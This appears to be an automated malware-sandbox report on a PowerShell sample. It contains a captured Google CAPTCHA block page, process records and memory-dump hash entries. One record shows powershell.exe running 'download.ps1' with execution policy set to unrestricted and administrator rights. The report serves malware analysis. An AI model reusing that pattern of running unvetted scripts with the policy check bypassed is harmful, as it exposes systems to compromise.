                                                                  X-XSS-Protection: 0
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 66 6f 6e 74 2d [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>http://www.google.com/</title></head><body style="font-family: arial, sans-serif; background-color: #fff; color: #000; padding:20px; font-size:18px; overscroll-behavior:contain;" onload="e=document.getElementById('captcha');if(e){e.focus();} if(solveSimpleChallenge) {solveSimpleChallenge(,);}"><div style="max-width:400px;"><hr noshade size="1" style="color:#ccc; background-color:#ccc;"><br><form id="captcha-form" action="index" method="post"><noscript><div style="font-size:13px;"> In order to continue, please enable javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" dat
                                                                  Dec 23, 2024 13:23:21.954557896 CET1289INData Raw: 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b
                                                                  Data Ascii: a-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="kasZJgq5TnnyIsRJ-vTjQ9WmqJID-BnEiavbAx0ZohwjjAOS-aoWwOMxWREkeh2XafUrX9LkbOf6v4cc3a_H3AbqUNS3wmP3pE5GH3B4V4IIw63yuCLChMMTMJNIouyluR7Vwu4WC3yrVmhy0gVFK6W
                                                                  Dec 23, 2024 13:23:21.954567909 CET777INData Raw: 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74
                                                                  Data Ascii: ervice</a>. The block will expire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you continue to use our services.<br><br>This traffic may have been sent by malicious software, a browser plug-in, or a s


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:07:23:16
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                  Imagebase:0x7ff640500000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:07:23:16
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7be100000
                                                                  File size:875'008 bytes
                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Reset < >
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.19718529252.00007FFD08930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD08930000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd08930000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6ee$6ee$6ee$ m~?$2~l?$2~l?$BNl?$BNl?$Xz@$Xz@$Xz@$Xz@$Xz@$Xz@$Xz@
                                                                    • API String ID: 0-2744590977
                                                                    • Opcode ID: 545b4987e86555828e9826899ee6ffd421f8546bf9f8641c29368ecb45a46e34
                                                                    • Instruction ID: 0670ff777ea2f498032e59d4889f4b3603a9c1a71faeeacedce2880b47a78966
                                                                    • Opcode Fuzzy Hash: 545b4987e86555828e9826899ee6ffd421f8546bf9f8641c29368ecb45a46e34
                                                                    • Instruction Fuzzy Hash: C0230232B0DA8A8FEB99EB28987566477E1EF69301F1800BDD05DC72C7DE29AC41C745
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.19715272776.00007FFD086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD086B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd086b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ffe710257aac3fc21badfacbccdfb67e964221b6c113a555ef3692c0fa3cbcbe
                                                                    • Instruction ID: bc6d74a250c250ccf4b354eb7fc178329a552e90456fff203882725d99120cd3
                                                                    • Opcode Fuzzy Hash: ffe710257aac3fc21badfacbccdfb67e964221b6c113a555ef3692c0fa3cbcbe
                                                                    • Instruction Fuzzy Hash: 4CF18330608A8E8FEBA8EF28D8557F937D1FF59310F44426AE84DC7295DF34A9458B81
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.19715272776.00007FFD086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD086B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd086b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce8423c22be08bda819ba670dde14a9caad6685a6fe5e309340f9f6377cd0daa
                                                                    • Instruction ID: 6f479d3db1a3c2824dd170245d99c75998aa5b0e2c3ce0b5fe0b87c04386ca20
                                                                    • Opcode Fuzzy Hash: ce8423c22be08bda819ba670dde14a9caad6685a6fe5e309340f9f6377cd0daa
                                                                    • Instruction Fuzzy Hash: BEE19330608A8D8FEBA8EF28C8657F977D1EF54310F44427AE84DC7295DF78A9458B81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.19718529252.00007FFD08930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD08930000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd08930000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6ee$2~l?$Xz@
                                                                    • API String ID: 0-2266533406
                                                                    • Opcode ID: 38e28dd716700faf149620ac5d9ec910305f8512223b76c6d55bb1063dc8fe69
                                                                    • Instruction ID: 4115ecc45a40e860562623ba4479413653bb5a92a9846465d42b230d748da7bc
                                                                    • Opcode Fuzzy Hash: 38e28dd716700faf149620ac5d9ec910305f8512223b76c6d55bb1063dc8fe69
                                                                    • Instruction Fuzzy Hash: CB121331B1CA8A8FEBA5EB2898656A477E1FF65301F1800FAD05DC72C7DE28AC45C745
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.19715272776.00007FFD086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD086B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd086b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6ee
                                                                    • API String ID: 0-1263381615
                                                                    • Opcode ID: f58e888e5b610a8f8d81c882f2a9b1638ec2535529a12b80e8de880ecd44e569
                                                                    • Instruction ID: 45b0d43f1c5028712518cd3d0fe03b287f2ba802cc4224c78ae226e17916f141
                                                                    • Opcode Fuzzy Hash: f58e888e5b610a8f8d81c882f2a9b1638ec2535529a12b80e8de880ecd44e569
                                                                    • Instruction Fuzzy Hash: 96D18E31B08A4D8FDF85DF5CC465AA9BBE1FF68314F55416AE409D739ACE24E881CB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.19715272776.00007FFD086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD086B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd086b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7e76bbb004cd8befbd715e900597202feef027558ce7fb214361c6cf4aac2908
                                                                    • Instruction ID: 2fae6b84ff7b264ac8ad4e1503d652a0c5b733e0d2361c015f4ae33b215dc20e
                                                                    • Opcode Fuzzy Hash: 7e76bbb004cd8befbd715e900597202feef027558ce7fb214361c6cf4aac2908
                                                                    • Instruction Fuzzy Hash: 1DB1C430608A8D8FDBA9EF28C8557F93BD1FF59310F44426AE84DC7296CA7499418B82
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.19715272776.00007FFD086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD086B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd086b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9335f80a320ef0c2d2c8053409dcf6dd03230ce395e15e933953648b6a31d92a
                                                                    • Instruction ID: e992b072d204bf1a24d1d186b5e5702627a923121bb699a77f54d308cfc26862
                                                                    • Opcode Fuzzy Hash: 9335f80a320ef0c2d2c8053409dcf6dd03230ce395e15e933953648b6a31d92a
                                                                    • Instruction Fuzzy Hash: B6412C71A0DBC84FDB09DB1C98266A97FF0EF5A310F04416FE499C3293CA246855C7D6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.19714702888.00007FFD0859D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD0859D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd0859d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9629c716f65eb594ee0e37fb29bd184cfdffdd6e16826f53e764ad922f4aeab8
                                                                    • Instruction ID: 1100e19c2b455ee5519c465a9e0a38cecac43f447b7f7b2fa6dec3373a3c74d1
                                                                    • Opcode Fuzzy Hash: 9629c716f65eb594ee0e37fb29bd184cfdffdd6e16826f53e764ad922f4aeab8
                                                                    • Instruction Fuzzy Hash: 3241387180DBC44FD757CB289856A523FF0EF53320B1505EFD088CB1A7D665A846C7A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.19715272776.00007FFD086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD086B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd086b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1b44322dd538e15b23411fae833a13669c76323311dfa010cf597d2adeed07f5
                                                                    • Instruction ID: 27b733bfef655539d8ddf8686578ad1759da376712efd1abd05d6b411b0f167f
                                                                    • Opcode Fuzzy Hash: 1b44322dd538e15b23411fae833a13669c76323311dfa010cf597d2adeed07f5
                                                                    • Instruction Fuzzy Hash: D021053090CB4C8FDB59DBAC984A7E97BE0EB9A321F04426FD449C3156DA74944ACB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.19715272776.00007FFD086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD086B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd086b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3ad662c8f6cdd26e63444012f3ef5219008968d2ccb39abaca202b69a8e1c2de
                                                                    • Instruction ID: dca2400d04e2b6ff1997e7ad8e60ff14226b775070f8110d6eb676b34b52c2c0
                                                                    • Opcode Fuzzy Hash: 3ad662c8f6cdd26e63444012f3ef5219008968d2ccb39abaca202b69a8e1c2de
                                                                    • Instruction Fuzzy Hash: 4D310D30A18A4ECEFBB4AF18CC6ABF932D4FF41319F814139E40D86096CA386985CF15
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.19718839653.00007FFD08960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD08960000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd08960000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1a5af51bdd0743a9133176422e71249801aef0b30d013d048e037805be7d1bba
                                                                    • Instruction ID: 2b4aca607b292a0b8c8379c73fb4257b3031e8f57d062c26190efd4cfefdfc11
                                                                    • Opcode Fuzzy Hash: 1a5af51bdd0743a9133176422e71249801aef0b30d013d048e037805be7d1bba
                                                                    • Instruction Fuzzy Hash: 0F01F132F0C9888FEB52EA28A4654A87BD0EF42221B1804BBD08DC7096DA25EC15C745
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.19715272776.00007FFD086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD086B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd086b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f55a794d53b7f7cda96026e4c7b0dd4ae140022e38c9a72741e17d2a076df23b
                                                                    • Instruction ID: 9ffd4074e49d9d3bc8768b56037df9674c1728e09ac7973c7db36cda49710075
                                                                    • Opcode Fuzzy Hash: f55a794d53b7f7cda96026e4c7b0dd4ae140022e38c9a72741e17d2a076df23b
                                                                    • Instruction Fuzzy Hash: 4A01A77020CB0C8FD744EF0CE451AA5B3E0FB85324F10062DE58AC3256DA36E882CB45
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.19718839653.00007FFD08960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD08960000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd08960000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1a2ef912cc6e1c613cb2f93d41753d02bede7e541119940f2d3d206ec663e7f
                                                                    • Instruction ID: 9c44a366bbad00e2803baf656b9088e318da5e265a55286ac68299b4db2deab2
                                                                    • Opcode Fuzzy Hash: c1a2ef912cc6e1c613cb2f93d41753d02bede7e541119940f2d3d206ec663e7f
                                                                    • Instruction Fuzzy Hash: 54F08C32F0C9558FDBA5EB0CE4918A877E0FF46321B1400FBE14ECB066D626EC158B88
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.19715272776.00007FFD086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD086B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd086b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08a783de267897c37de7b65d60bfc8df45b299aafbef76fae3cb748ac2d9c1fd
                                                                    • Instruction ID: 08a65b561d20833809c07339d2aaa632268b755d04ffa975536c0fdddf3e55bb
                                                                    • Opcode Fuzzy Hash: 08a783de267897c37de7b65d60bfc8df45b299aafbef76fae3cb748ac2d9c1fd
                                                                    • Instruction Fuzzy Hash: 6DF0BB3180C6C98FDB06DF2888555E57FA0FF26250B0502DBE45CC71A2DB64A854CBD2